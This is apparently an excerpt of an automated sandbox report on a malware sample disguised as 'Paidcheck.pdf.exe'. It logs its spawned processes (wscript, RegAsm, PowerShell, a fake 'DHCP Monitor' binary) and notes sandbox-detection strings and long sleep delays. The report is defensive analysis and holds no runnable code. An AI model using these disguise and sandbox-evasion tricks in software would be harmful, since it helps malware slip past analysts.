      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: Paidcheck.pdf.exe, 00000000.00000002.306008181.0000000002CD5000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeWindow / User API: threadDelayed 2166Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWindow / User API: threadDelayed 1995Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWindow / User API: threadDelayed 7581Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWindow / User API: foregroundWindowGot 420Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWindow / User API: foregroundWindowGot 504Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3562Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3681Jump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe TID: 2412Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe TID: 3360Thread sleep time: -21213755684765971s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3820Thread sleep time: -1844674407370954s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe TID: 5380Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 1260Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 5900Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
